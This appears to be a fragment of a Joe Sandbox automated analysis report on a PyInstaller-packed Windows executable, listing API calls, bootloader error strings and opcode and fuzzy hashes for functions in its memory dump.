                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                • Opcode ID: 9d56af8893561126369cce298ca858632f1bca0e111e0b68f57014dc206871cc
                                                                                                                                                                                                                • Instruction ID: d5c47ec528b86b7a0957f9aa03db427332a3aecfa460762a7b2204642eb2d122
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d56af8893561126369cce298ca858632f1bca0e111e0b68f57014dc206871cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22318263B3864346EA24DB51E8509BB63A1EF04FD4F584072DF4D87AA5FE3CE585A700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                • Opcode ID: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
                                                                                                                                                                                                                • Instruction ID: e91c2a6a356c227ebd1d635e4b4a83164e322ddaae32b393a81599a07d25c66e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EE18E77A3875586EB209B2594806AF77A4FB44F88F004576EE4D87BA6CF38E5C1D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A608847
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A60889E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharMultiWide
                                                                                                                                                                                                                • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                • API String ID: 626452242-27947307
                                                                                                                                                                                                                • Opcode ID: 946c277c1fe64d7752950c04badb497d02cc135d75d0a4af96f6f0d747498fb2
                                                                                                                                                                                                                • Instruction ID: 9aa077286b22a75deb2587ca0880d822f6757d50a2602f1a05d9338e16e56d4b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 946c277c1fe64d7752950c04badb497d02cc135d75d0a4af96f6f0d747498fb2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1418F33A28B8282E620DF15B84057BB7A5FB88F90F544575DA8D87BA5EF3CD485E700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00007FF67A6039EA), ref: 00007FF67A608D31
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67A6088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A602A14
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: MessageBoxW.USER32 ref: 00007FF67A602AF0
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00007FF67A6039EA), ref: 00007FF67A608DA5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                • API String ID: 3723044601-27947307
                                                                                                                                                                                                                • Opcode ID: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
                                                                                                                                                                                                                • Instruction ID: 223844c5749dc65152a10ce9a91d3541bcb7f0656ddea76ec16d314a1ea945e9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32216B33A29B42C5EA10DF26E84007B76A1EF94F80B544675CB4D877E5EF3CE541A340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                                                                                • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                                                                                • API String ID: 3231891352-3501660386
                                                                                                                                                                                                                • Opcode ID: eed310647cf0b76c9ed608e4a94a25af760cd3a9bab53f82cf3118da1903d891
                                                                                                                                                                                                                • Instruction ID: f392ef16bd8ac461b9a71a2c2b897c6a4290688a21bc88e73500a1d30914c7c3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eed310647cf0b76c9ed608e4a94a25af760cd3a9bab53f82cf3118da1903d891
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE51D467E3DA4346FA51AB25D500ABB66919F84FC0F5400B1EE4DC77F6EE2CE581AB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67A602ABB), ref: 00007FF67A608C1A
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF67A6079B1,00000000,?,00000000,00000000,?,00007FF67A60154F), ref: 00007FF67A60748F
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A602B30: MessageBoxW.USER32 ref: 00007FF67A602C05
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF67A6074EA
                                                                                                                                                                                                                • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF67A607466
                                                                                                                                                                                                                • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF67A6074A3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                                • API String ID: 1662231829-3498232454
                                                                                                                                                                                                                • Opcode ID: 4b3c020fd13166d28c819a7d3267133a3eaacb6fee3cd099781d96b43d4de662
                                                                                                                                                                                                                • Instruction ID: 7429ab581c30251c70642dd34917d331fafb607c8ce6815cc18ee237ba6b4e4d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b3c020fd13166d28c819a7d3267133a3eaacb6fee3cd099781d96b43d4de662
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD319557B39B8281FA21EB21E5517FB5291AF98FC0F4444B1DB4EC26F6EE2CE5449A00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF67A60E16A,?,?,?,00007FF67A60DE5C,?,?,00000001,00007FF67A60DA79), ref: 00007FF67A60DF3D
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF67A60E16A,?,?,?,00007FF67A60DE5C,?,?,00000001,00007FF67A60DA79), ref: 00007FF67A60DF4B
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF67A60E16A,?,?,?,00007FF67A60DE5C,?,?,00000001,00007FF67A60DA79), ref: 00007FF67A60DF75
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF67A60E16A,?,?,?,00007FF67A60DE5C,?,?,00000001,00007FF67A60DA79), ref: 00007FF67A60DFBB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF67A60E16A,?,?,?,00007FF67A60DE5C,?,?,00000001,00007FF67A60DA79), ref: 00007FF67A60DFC7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                • Opcode ID: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
                                                                                                                                                                                                                • Instruction ID: 1474da1610a0a45c93a8313ec59cc3eac9096d81434b189e6e164648065eed36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3318522A3B742D5EA119F22A800A772394FF48FA4F594675DE1E977A0DE3CE4959300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67A602ABB), ref: 00007FF67A608C1A
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67A6088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A602A14
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: MessageBoxW.USER32 ref: 00007FF67A602AF0
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67A602ABB), ref: 00007FF67A608CA0
                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
• Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                • API String ID: 3723044601-876015163
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61B997
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61B9CD
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61B9FA
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61BA0B
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61BA1C
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF67A6155CD,?,?,?,?,00007FF67A61F2BF,?,?,00000000,00007FF67A61BAA6,?,?,?), ref: 00007FF67A61BA37
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                • String ID: csm$f
                                                                                                                                                                                                                • API String ID: 2395640692-629598281
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67A6088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A602A14
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608570: GetLastError.KERNEL32(00000000,00007FF67A602A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A608597
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608570: FormatMessageW.KERNEL32 ref: 00007FF67A6085C6
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A608BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67A602ABB), ref: 00007FF67A608C1A
                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF67A602AF0
                                                                                                                                                                                                                • MessageBoxA.USER32 ref: 00007FF67A602B0C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                                • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                • API String ID: 2806210788-2410924014
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61BA6F
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61BA8E
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61BAB6
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61BAC7
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF67A61AC67,?,?,00000000,00007FF67A61AF02,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61BAD8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                • API String ID: 1878133881-2410924014
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF67A6039EA), ref: 00007FF67A603F01
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67A6088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67A60101D), ref: 00007FF67A602A14
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A6029E0: MessageBoxW.USER32 ref: 00007FF67A602AF0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                                • API String ID: 2581892565-1977442011
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
• Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A6196D6
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: RtlFreeHeap.NTDLL(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B022
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: GetLastError.KERNEL32(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B02C
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF67A60C0E5), ref: 00007FF67A6196F4
                                                                                                                                                                                                                Strings
